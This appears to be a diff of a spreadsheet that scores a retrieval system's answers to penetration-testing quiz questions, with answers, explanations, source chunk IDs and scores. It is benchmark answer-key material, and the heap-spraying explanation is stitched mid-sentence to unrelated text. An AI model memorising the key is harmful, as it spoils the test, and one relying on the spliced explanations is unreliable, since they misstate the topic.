-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I229" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J229" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K229" t="inlineStr">
         <is>
@@ -15887,7 +14704,7 @@
       <c r="F230" t="inlineStr">
         <is>
           <t>Answer: Fileless malware technique
-Explanation: The correct answer is 'Fileless malware technique'. Fileless malware operates by leveraging scripts or loading malicious content directly into memory. This type of malware does not write any part of its activities to the disk, making it difficult to detect with traditional antivirus tools that monitor file systems for changes. It is a preferred choice in sophisticated APT campaigns aiming to remain undetected. The other choices, such as 'OS fingerprinting', 'Cross-site scripting', and 'SQL injection', are also techniques used in cyber attacks, but they do not pertain to maintaining persistence on a system without leaving a file system footprint. OS fingerprinting is used for gathering information about a target system's operating system, not for maintaining persistence. Cross-site scripting and SQL injection are attack vectors that exploit input validation vulnerabilities in web applications, targeting data manipulation and user session hijacking, respectively, rather than exploiting memory corruption to execute arbitrary code.</t>
+Explanation: The correct answer is 'Fileless malware technique'. Fileless malware operates by leveraging scripts or loading malicious content directly into memory. This type of malware does not write any part of its activities to the disk, making it difficult to detect with traditional antivirus tools that monitor file systems for changes. It is a preferred choice in sophisticated APT campaigns aiming to remain undetected. The other choices, such as 'OS fingerprinting,' 'Cross-site scripting,' and 'SQL injection,' are also techniques used in cyber attacks, but they do not pertain to maintaining persistence on a system without leaving a filesystem footprint. OS fingerprinting is used for gathering information about a target system's operating system, not for maintaining persistence on a system without leaving a filesystem</t>
         </is>
       </c>
       <c r="G230" t="inlineStr">
@@ -15901,21 +14718,16 @@
 preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I230" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J230" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K230" t="inlineStr">
         <is>
@@ -15968,21 +14780,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I231" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J231" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K231" t="inlineStr">
         <is>
@@ -16021,10 +14828,7 @@
       <c r="F232" t="inlineStr">
         <is>
           <t>Answer: Manipulating function return addresses
-Explanation: Manipulating function return addresses is the primary purpose in buffer overflow attacks. By
-altering the return address on the stack, an attacker can redirect the execution flow of a program to execute
-arbitrary code, typically leading to unauthorized actions by the program. The other options are tactics used in
-buffer overflow attacks but do not directly pertain to the manipulation of the return path of execution.</t>
+Explanation: Manipulating function return addresses is the primary purpose of buffer overflow attacks. By altering the return address on the stack, an attacker can redirect the execution flow of a program to execute arbitrary code, typically leading to unauthorized actions by the program. Option 0 (Changing the stack pointer to execute a nop-sled) and option 3 (Injecting shellcode into environment variables) are both tactics used in buffer overflow attacks but don't pertain directly to the manipulation of the return path of execution. Option 2 (Overwriting local variables to alter program flow) can be part of an attack but does not directly involve taking control over the execution flow through the return address, which is the most direct and effective means of achieving execution control in a buffer overflow scenario.</t>
         </is>
       </c>
       <c r="G232" t="inlineStr">
@@ -16038,21 +14842,16 @@
 preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I232" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J232" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K232" t="inlineStr">
         <is>
@@ -16105,21 +14904,16 @@
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I233" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J233" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K233" t="inlineStr">
         <is>
@@ -16158,7 +14952,7 @@
       <c r="F234" t="inlineStr">
         <is>
           <t>Answer: Extracting hardcoded credentials using static analysis tools
-Explanation: In the context of penetration testing, extracting hardcoded credentials using static analysis tools is the most effective technique for identifying security vulnerabilities that allow attackers to bypass authentication mechanisms in a legacy web application. This approach targets vulnerabilities that are common in legacy systems where developers might have hardcoded credentials or sensitive data directly in the source code, making it easily readable and exploitable through static analysis without executing the program. Performing a DDoS attack would primarily test the availability and not directly reveal authentication bypass vulnerabilities. Breaking cryptography with quantum computing, while theoretically potent, is impractical with current technology levels and does not specifically target authentication bypass. Lastly, exploiting SQL injection vulnerabilities through input validation is a valid testing approach, but it does not necessarily bypass authentication unless corruption vulnerabilities as described in the scenario.</t>
+Explanation: In the context of penetration testing, extracting hardcoded credentials using static analysis tools is the most effective technique for identifying security vulnerabilities that allow attackers to bypass authentication mechanisms in a legacy web application. This approach targets vulnerabilities that are common in legacy systems where developers might have hardcoded credentials or sensitive data directly in the source code, making it easily readable and exploitable through static analysis without executing the program. Performing a DDoS attack would primarily test the availability and not directly reveal authentication bypass vulnerabilities. Breaking cryptography with quantum computing, while theoretically potent, is impractical with current technology levels and does not specifically target authentication bypass. Lastly, exploiting SQL injection through input validation is a valid testing approach, but it does not necessarily bypass authentication unless corruption vulnerabilities as described in the scenario.</t>
         </is>
       </c>
       <c r="G234" t="inlineStr">
@@ -16172,21 +14966,16 @@
 preemware_pentestingeval.pdf (Chunk: ab64f5ee-2cb7-453d-97a6-cf3df8ab2636, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1bf7372e-dcae-42ee-a9d9-0b1222053518, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I234" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J234" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K234" t="inlineStr">
         <is>
@@ -16225,7 +15014,7 @@
       <c r="F235" t="inlineStr">
         <is>
           <t>Answer: Conducting a static code analysis
-Explanation: Conducting a static code analysis is the most effective method for uncovering vulnerabilities directly within the code of a custom-built software application. This technique involves examining the code without executing it to identify potential security flaws, logic errors, and non-compliance with coding standards, which are essential for understanding security weaknesses inherent in the application's design and implementation. Fuzzing the application interface, while useful, tests the software's reaction to unexpected or malformed data inputs. Performing a penetration test on the network layer may reveal vulnerabilities in the network infrastructure but does not directly analyze the code for potential security weaknesses. Deploying a honeypot within the network infrastructure is primarily used for monitoring and protecting against unauthorized access, rather than identifying vulnerabilities in custom-built software applications.</t>
+Explanation: Conducting a static code analysis is the most effective method for uncovering vulnerabilities directly within the code of a custom-built software application. This technique involves examining the code without executing it to identify potential security flaws, logic errors, and non-compliance with coding standards, which are essential for understanding security weaknesses inherent in the application's design and implementation. Fuzzing the application interface, while useful, tests the software's reaction to unexpected or malformed data inputs but does not directly analyze the code itself. Performing a penetration test on the network layer focuses on identifying vulnerabilities at the network level rather than within the application code. Deploying a honeypot within the network infrastructure is used for monitoring and analyzing unauthorized access attempts, but it doesn't provide direct insights into potential security weaknesses in the custom-built software application's code.</t>
         </is>
       </c>
       <c r="G235" t="inlineStr">
@@ -16239,21 +15028,16 @@
 preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I235" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J235" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K235" t="inlineStr">
         <is>
@@ -16292,7 +15076,7 @@
       <c r="F236" t="inlineStr">
         <is>
           <t>Answer: Heap spraying
-Explanation: In the context of exploit development, heap spraying is a technique used to manipulate memory allocation functions to execute arbitrary code. By allocating large amounts of memory on the heap and filling it with shellcode or other executable data, an attacker increases the probability that a vulnerable memory access will jump to an address containing their intercepted code. This allows them to exploit vulnerabilities in the application code itself. Stack-based buffer overflows, while related to improper memory management, typically involve overflowing adjacent memory locations rather than manipulating memory allocation functions directly. Integer overflows can enable attackers to redirect memory operations or execute arbitrary code, but they are not specifically used for manipulating memory allocation functions. Format string vulnerabilities occur when a program uses user input as a format string without proper validation, potentially allowing an attacker to execute arbitrary code by manipulating the format string. However, this type of vulnerability is not primarily exploited by manipulating memory allocation functions.</t>
+Explanation: Heap spraying is a technique used in exploit development where large amounts of memory are allocated (typically on the heap) and 'sprayed' with shellcode or other executable data. By doing this, an attacker increases the probability that a vulnerable memory access will jump to an address containing their intercepts traffic but allows testers to modify the traffic, enabling them to test the security of web application sessions in real time.</t>
         </is>
       </c>
       <c r="G236" t="inlineStr">
@@ -16306,21 +15090,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I236" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J236" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K236" t="inlineStr">
         <is>
@@ -16359,7 +15138,7 @@
       <c r="F237" t="inlineStr">
         <is>
           <t>Answer: Examining the control flow of the executable
-Explanation: Examining the control flow of the executable is the most effective method for identifying potential evasion techniques used by a malware sample. This approach involves analyzing how the malware interacts with its environment, including checking for the presence of debuggers, virtual machines, and specific processes or user interactions. It's a more direct way to detect evasion techniques compared to the other options provided. Analyzing leaked sandbox reports can be helpful but relies on others' findings and may not cover all possible evasion techniques. Patching vulnerabilities locally is a preventive measure rather than an analysis technique, while writing YARA rules based on signature patterns is more focused on pattern matching and may miss novel or complex evasion techniques.</t>
+Explanation: Examining the control flow of the executable is the most effective method for identifying potential evasion techniques used by a malware sample. By analyzing the control flow, analysts can observe how the malware manipulates system calls and interacts with the operating system, potentially revealing evasion tactics such as anti-debugging or anti-emulation mechanisms. While other options like analyzing leaked sandbox reports, patching vulnerabilities locally, and writing YARA rules based on signature patterns may provide some insights into malware behavior, examining control flow provides a more direct approach to identifying evasion techniques.</t>
         </is>
       </c>
       <c r="G237" t="inlineStr">
@@ -16373,21 +15152,16 @@
 preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I237" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J237" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K237" t="inlineStr">
         <is>
@@ -16426,7 +15200,7 @@
       <c r="F238" t="inlineStr">
         <is>
           <t>Answer: EternalBlue vulnerability
-Explanation: The EternalBlue vulnerability specifically exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This was famously exploited by the WannaCry ransomware attack, which propagated rapidly across networks globally.</t>
+Explanation: The correct answer is the EternalBlue vulnerability. This specific vulnerability exploits a flaw in Microsoft's implementation of the Server Message Block (SMB) protocol, which is used by Windows systems for file sharing and printer services. By exploiting this vulnerability, an attacker can gain broad access to networked resources and systems, making it highly effective in red team operations targeting networks with predominantly Windows-based infrastructure. The other options - Shellshock, Heartbleed, and Dirty COW - are related to different technologies or components and do not specifically exploit the SMB protocol.</t>
         </is>
       </c>
       <c r="G238" t="inlineStr">
@@ -16440,21 +15214,16 @@
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 2d288e67-2299-4d6a-b2b6-261bd12f66f0, Type: dense, Rank: 6)
-legacy-writeup-w-o-metasploit.md (Chunk: 220eb143-15bc-44fd-b9f9-d100667d4531, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: sparse, Rank: 8)
-blue-writeup-w-o-metasploit.md (Chunk: 6bdfc453-8357-46e7-876e-6be098a52409, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I238" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J238" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K238" t="inlineStr">
         <is>
@@ -16493,7 +15262,7 @@
       <c r="F239" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: The Padding Oracle Attack is a type of side-channel attack that specifically targets the way cryptographic padding is handled within secure communication protocols. This attack allows an attacker to decrypt data without knowing the key by exploiting mistakes in how applications check ciphertext padding. It involves sending variations of the ciphertext to the server and analyzing the responses (errors, timings, etc.), which can then be used to infer the plaintext byte by byte. Cross-Site Scripting (XSS) and SQL Injection are attacks that target web application vulnerabilities related to script injection and database manipulation respectively, while Directory Traversal attacks exploit security weaknesses in web servers allowing attackers to access restricted directories. None of these options directly relate to encryption padding flaws.</t>
+Explanation: The Padding Oracle Attack is the correct answer because it specifically targets the way cryptographic padding is handled within secure communication protocols. This type of attack allows an attacker to decrypt data without knowing the key by exploiting mistakes in how applications check ciphertext padding. Cross-Site Scripting (XSS) and SQL Injection are attacks that target script injection and database manipulation vulnerabilities respectively, while Directory Traversal exploits security vulnerabilities in web servers allowing attackers to access restricted directories; none of these directly relate to encryption padding flaws.</t>
         </is>
       </c>
       <c r="G239" t="inlineStr">
@@ -16507,21 +15276,16 @@
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ed0ba5f3-2b68-477d-b01e-8dc5589ac689, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I239" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J239" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K239" t="inlineStr">
         <is>
@@ -16560,7 +15324,7 @@
       <c r="F240" t="inlineStr">
         <is>
           <t>Answer: ROP chain
-Explanation: A Return-Oriented Programming (ROP) chain is an advanced technique used particularly to bypass DEP (Data Execution Prevention) mechanisms in modern operating systems. DEP prevents execution of code from a non-executable memory space, thus thwarting traditional buffer overflow attacks where attackers inject and execute their code. ROP bypasses DEP by using valid pieces of code (gadgets) already in memory (typically from loaded system libraries) to perform arbitrary computations. This is done by chaining together these 'gadgets' to achieve the desired outcome, effectively directing execution flow without directly injecting new code into memory. Heap spraying, while a useful technique in certain scenarios, primarily aims at facilitating the reliability of other exploits by filling a large region of memory with shellcode. Stack-based buffer overflow and integer overflow are also valid vulnerabilities but do not inherently include mechanisms to evade modern security features like ASLR and DEP.</t>
+Explanation: In the context of modern exploit development against applications with ASLR and DEP/NX, the technique that is essential for reliably directing execution flow when direct code injection is unfeasible is a 'ROP chain'. This technique manipulates the control flow of a program by executing small snippets of code already present in a program's memory (called 'gadgets'), effectively allowing an attacker to execute arbitrary code even if direct code injection is not possible.</t>
         </is>
       </c>
       <c r="G240" t="inlineStr">
@@ -16574,21 +15338,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c68750ec-caab-464f-a343-de1db420fb17, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I240" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J240" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K240" t="inlineStr">
         <is>
@@ -16627,10 +15386,10 @@
       <c r="F241" t="inlineStr">
         <is>
           <t>Answer: Stack-based buffer overflow
-Explanation: A stack-based buffer overflow occurs when more data is put into a fixed-length block of memory, or buffer, than the buffer is allocated to hold. This excess data spills over into adjacent buffers, which can corrupt or overwrite the valid data held in them, including return addresses. Stack-based buffer overflows can change the execution path of the software, leading to the execution of malicious code. The other options:
-- Integer overflow is a type of numeric overflow that occurs when an integer value exceeds its maximum limit and wraps around to a negative number. It does not inherently provide a method for controlling execution flow under strict memory protections.
-- Heap spraying involves filling the heap with specific data patterns in order to increase the likelihood of certain conditions being met when exploiting a vulnerability, such as an out-of-bounds read or write. While it can be used in conjunction with buffer overflow attacks, it is not a technique that directly involves inputting more data into a program's buffer than it is designed to handle.
-- Format string vulnerabilities occur when user input is treated as a format string for functions like printf or scanf without proper validation, leading to unintended memory access and potentially execution of arbitrary code. However, they do not inherently involve inputting more data into a program's buffer than it is designed to handle.</t>
